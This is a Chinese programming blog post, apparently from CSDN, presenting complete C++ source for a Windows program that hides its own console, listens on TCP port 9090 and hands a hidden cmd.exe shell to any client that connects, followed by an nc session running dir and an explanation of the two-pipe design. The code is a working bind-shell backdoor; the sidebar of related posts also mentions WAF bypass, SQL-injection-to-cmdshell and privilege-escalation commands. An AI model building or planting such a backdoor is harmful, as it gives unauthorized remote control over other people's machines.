双管道打开cmdshell

最新推荐文章于 2019-05-16 23:07:11 发布
最新推荐文章于 2019-05-16 23:07:11 发布
阅读量1k 收藏
点赞数
分类专栏: VS2010 C++ pipe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9402377
版权
VS2010 同时被 3 个专栏收录
61 篇文章 0 订阅
订阅专栏
C++
53 篇文章 0 订阅
订阅专栏
pipe
2 篇文章 0 订阅
订阅专栏

源代码如下:

#include <WinSock2.h>
#include <stdio.h>
#include <conio.h>
#pragma comment(lib,"Ws2_32") 

#define	SZBUFFER_SIZE	1024
#define LST_PORT		9090

SOCKET InitializeServer(VOID) {
	WORD version = MAKEWORD(2, 2);
	WSADATA wsaData;
	SOCKET listeningSocket;

	WSAStartup(version, &wsaData);

	if ((listeningSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
		return NULL;

	// Fill SOCKADDR_IN
	SOCKADDR_IN saServer;

	saServer.sin_family = AF_INET;
	saServer.sin_addr.s_addr = INADDR_ANY;
	saServer.sin_port = htons(LST_PORT);

	// Bind the socket to our local server address
	if (bind(listeningSocket, (LPSOCKADDR) & saServer, sizeof(struct sockaddr)) == SOCKET_ERROR)
		return NULL;

	// Make the socket listen
	if (listen(listeningSocket, 10) == SOCKET_ERROR)
		return NULL;

	// Wait for a client
	return accept(listeningSocket, NULL, NULL);
}

BOOL CreateShellProcess(PROCESS_INFORMATION *pi, HANDLE *hCmdIn, HANDLE *hCmdOut, HANDLE *hSocketIn, HANDLE *hSocketOut, SOCKET *clientSocket) {
	STARTUPINFO si;
	SECURITY_ATTRIBUTES sa;
	SECURITY_DESCRIPTOR sd;

	// Initialize security descriptor
	InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
	SetSecurityDescriptorDacl(&sd, true, NULL, false);

	// Initialize security attrubutes
	sa.lpSecurityDescriptor = &sd;
	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
	sa.bInheritHandle = true;

	if (!CreatePipe(hCmdIn, hSocketOut, &sa, 0))   //create stdin pipe
		return FALSE;

	if (!CreatePipe(hSocketIn, hCmdOut, &sa, 0))  //create stdout pipe
		return FALSE;

	GetStartupInfo(&si);

	si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_HIDE;
	si.hStdOutput = *hCmdOut;
	si.hStdError = *hCmdOut;
	si.hStdInput = *hCmdIn;
	char app_spawn[] = "C:\\WINDOWS\\system32\\cmd.exe";

	// Spawn the shell process
	if (!CreateProcess(app_spawn, NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE,
			NULL, NULL, &si, pi)) {
		printf("CreateProcess:%d\n", GetLastError());
		return FALSE;
	}
	return TRUE;
}

unsigned long GetNumberOfBytesToRead(HANDLE hSocketIn, char* szBuffer, int szBufferSize, int iLoop) {
	int i;
	unsigned long uRead = 0;
	unsigned long uAvail = 0;

	for (i = 0; i < iLoop; i++) {
		PeekNamedPipe(hSocketIn, szBuffer, szBufferSize, &uRead, &uAvail,
				NULL);
		if (uRead != 0)
			break;
	}
	return uRead;
}

int main(char *argv[], int argc) {
	char szBuffer[SZBUFFER_SIZE];

	// Hide current window
	GetConsoleTitle(szBuffer, sizeof(szBuffer));
	ShowWindow(FindWindow(NULL, szBuffer), SW_HIDE);

	// Pipes handles
	HANDLE hCmdIn, hCmdOut, hSocketIn, hSocketOut;
	PROCESS_INFORMATION pi;

	int nRet;

	// Wait for a client
	SOCKET clientSocket;

	// Launch server
	clientSocket = InitializeServer();
	if (clientSocket == NULL || clientSocket == INVALID_SOCKET)
		exit(-1);

	// Create shell process with stdin/sdtout redirected
	if (!CreateShellProcess(&pi, &hCmdIn, &hCmdOut, &hSocketIn,
			&hSocketOut, &clientSocket))
		exit(-1);

	unsigned long exit = 0;  //process exit code
	unsigned long bread;   //bytes read

	while(TRUE){
		// Check if child is still active
		ZeroMemory(szBuffer, SZBUFFER_SIZE);
		GetExitCodeProcess(pi.hProcess, &exit);
		if (exit != STILL_ACTIVE)
			break;

		while (GetNumberOfBytesToRead(hSocketIn, szBuffer, sizeof(szBuffer),
				10000)) {
			ZeroMemory(szBuffer, SZBUFFER_SIZE);
			ReadFile(hSocketIn, szBuffer, sizeof(szBuffer), &bread, NULL);

			if (send(clientSocket, szBuffer, strlen(szBuffer), 0) == SOCKET_ERROR)
				break;
		}

		ZeroMemory(szBuffer, SZBUFFER_SIZE);
		nRet = recv(clientSocket, szBuffer, sizeof(szBuffer), 0);
		if (nRet == SOCKET_ERROR) {
			printf("Error on recv()");
			return -1;
		}

		int i;
		for (i = 0; i < nRet; i++) {
			WriteFile(hSocketOut, &szBuffer[i], 1, &bread, NULL);
		}
	}
	WSACleanup();
	return 0;
}

在cmd里运行nc来连接9090端口,输出如下: 

D:\>nc.exe 127.0.0.1 9090

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

d:\my documents\visual studio 2010\Projects\test\two_pipe>
d:\my documents\visual studio 2010\Projects\test\two_pipe>dir
dir
 驱动器 D 中的卷是 本地磁盘
 卷的序列号是 6C97-9E44

 d:\my documents\visual studio 2010\Projects\test\two_pipe 的目录

2013-07-21  17:07    <DIR>          .
2013-07-21  17:07    <DIR>          ..
2013-07-21  23:27    <DIR>          Debug
2013-07-21  17:26    <DIR>          Release
2013-07-21  23:26             4,021 two_pipe.cpp
2013-07-21  17:07             3,926 two_pipe.vcxproj
2013-07-21  16:19               946 two_pipe.vcxproj.filters
2013-07-21  16:02               143 two_pipe.vcxproj.user
               4 个文件          9,036 字节
               4 个目录 36,606,078,976 可用字节

d:\my documents\visual studio 2010\Projects\test\two_pipe>exit
exit


D:\>

用CreatePipe创建了两个管道: 

	if (!CreatePipe(hCmdIn, hSocketOut, &sa, 0))   //create stdin pipe
		return FALSE;

	if (!CreatePipe(hSocketIn, hCmdOut, &sa, 0))  //create stdout pipe
		return FALSE;

然后把hCmdIn作为子进程的输入,hCmdOut作为子进程的输出: 

	si.hStdOutput = *hCmdOut;
	si.hStdError = *hCmdOut;
	si.hStdInput = *hCmdIn;

nc连上去后,hCmdOut输出到hSocketIn,显示到控制台上来,然后从控制台输入命令,如dir,写到hSocketOut去,hSocketOut输入到hCmdIn里去,流程就是这样。

如果学过java,则会好理解一些,java里有socket.getInputStream()和socket.getOutputStream()。

读就是从socket.getInputStream()里读取,写是往socket.getOutputStream()里去。

这里我把变量名命名为hSocketIn和hSocketOut,应该就比较好理解了。

feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jsp文件上传_文件上传突破waf总结
weixin_39844284的博客
12-01 663
前言在这个waf横行的年代,绕waf花的时间比找漏洞还多,有时候好不容易找到个突破口,可惜被waf拦得死死的。。。这里总结下我个人常用的文件上传绕过waf的方法,希望能起到抛砖引玉的效果,得到大佬们指点下。常见情况下面总结下我经常遇到的情况:一. 检测文件扩展名很多waf在上传文件的时候会检测文件扩展名,这个时候又能细分几种情况来绕过。1. 寻找黑名单之外的扩展名比如aspx被拦截,来个ashx就...
xp_cmdshell开启与关闭
09-11
xp_cmdshell开启与关闭 xp_cmdshell是一种功能强大的扩展存储过程,允许系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。该扩展存储过程可以让管理员以命令行方式执行...
实例演示oracle注入获取cmdshell的全过程
杨航的专栏
12-14 1万+
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成   /xxx.jsp?id=1 and '1'   的形式即可。(用" 'a'|| "是为了让语句返回true值)   语句有点长,可能要用post提交。   以下是各个步骤:   1.创建包   通过注入 SYS.DBMS_EX
一个简单的CMDSHELL后门
03-27 1191
一个简单的CMDSHELL后门文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的)信息来源: 邪恶八进制 中国   最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。  程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来
关于cmdshell提权的一些命令
tsvico的博客
04-13 2693
CMD部分提权常用命令 ipconfig         显示本地IP地址 net start telnet           开telnet服务 net use z:127.0.0.1c$     映射对方的C盘  net user            查看所有用户列表 net user xiaoma xiao
C语言实现简单CMDShell
weixin_30532973的博客
06-11 154
1.首先使用vc6编译器编译后门,并运行 #pragma comment(lib,"ws2_32.lib") #ifdef _MSC_VER #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) #endif #include <winsock2.h> #i...
SQL入侵恢复xp_cmdshell方法总结
09-11
恢复xp_cmdshell SQL Server阻止了对组件 'xp_cmdshell' 的过程'sys.xp_cmdshell' 启用
SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx
06-23
SQL Server阻止了对组件xp_cmdshell过程的解决方案。 错误描述:SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过...
Shell 管道及执行顺序分析
01-20
1、基本概念 a、I/O重定向通常与 FD有关,shell的FD通常为10个,即 0~9; b、常用FD有3个,为0(stdin,标准输入)、1(stdout,标准输出)、2(stderr,标准错误输出),默认与keyboard、monitor、monitor有关; c...
SQL阻止组件xp_cmdshell过程解决方案
01-19
 SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用'xp_cmdshell'。有关启用'xp_cmdshell'的详细...
jsp webshell cmd
10-18
jsp webshell cmd jsp 代码
博乐安全网远程CmdShell远程控制匿名管道
07-15
管道,写管道,创建匿名管道,获取启动信息_,创建进程,读文件,写文件,关闭句柄,结束进程,打开进程句柄
好用的cmdshell反弹工具
06-19
好用的cmdshell反弹工具;好用的cmdshell反弹工具
jspshell 一句话
07-24
jsp shell
管道(CreatePipe)与cmd.exe进程间通信的有关问题 完美解决代码
11-17
管道(CreatePipe)与cmd.exe进程间通信的有关问题 完美解决代码 ,发布啦
jsp命令行页面-执行shell
落叶翩翩的CSDN博客
01-16 7959
看效果截图: jsp文件如下: 放在同一目录下,需要导入jquery,jquery版本最低1.7: cmd.jsp jsp命令行页面 textarea{ background-color: #000; color:red; width:100%; } 请输入命令: $(function(){ $("#cmd").keydown(functio
简单的cmd管道后门
qq_42124567的博客
05-16 970
这几天学习了一下windows后门编程,并尝试着写了一个简单的cmd管道后门。主要涉及到了socket通信和管道。 后门分为主动连接型和反向连接型,区别就是一个是后门程序作为服务端,另一个是后门程序作为客户端。 管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。 多的不说,直接上代码,我觉得注...
在VS Code 中修改默认的命令终端(shell)
热门推荐
张小桀的博客
09-18 6万+
在日常使用vscode编辑器中, 我们可以通过 Ctrl+反引号快捷键来调出终端面板, 如下图: 其中的shell(上图右下圈红部分)是可以设置的,  接下来,教大家如何更改默认的shell 1.在文件 -&gt; 首选项 -&gt; 设置中打开settings页面, 搜索shell或则找到Terminal&gt;Integrated&gt;Shell:Windows, 2.把...
cmdshell命令
最新发布
09-19
cmdshell是一种命令行工具,它允许用户在Windows系统上执行命令和脚本。通过cmdshell,用户可以与操作系统进行交互,并执行各种任务,如文件操作、进程管理等。 以下是一些常用的cmdshell命令: 1. dir:显示当前...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值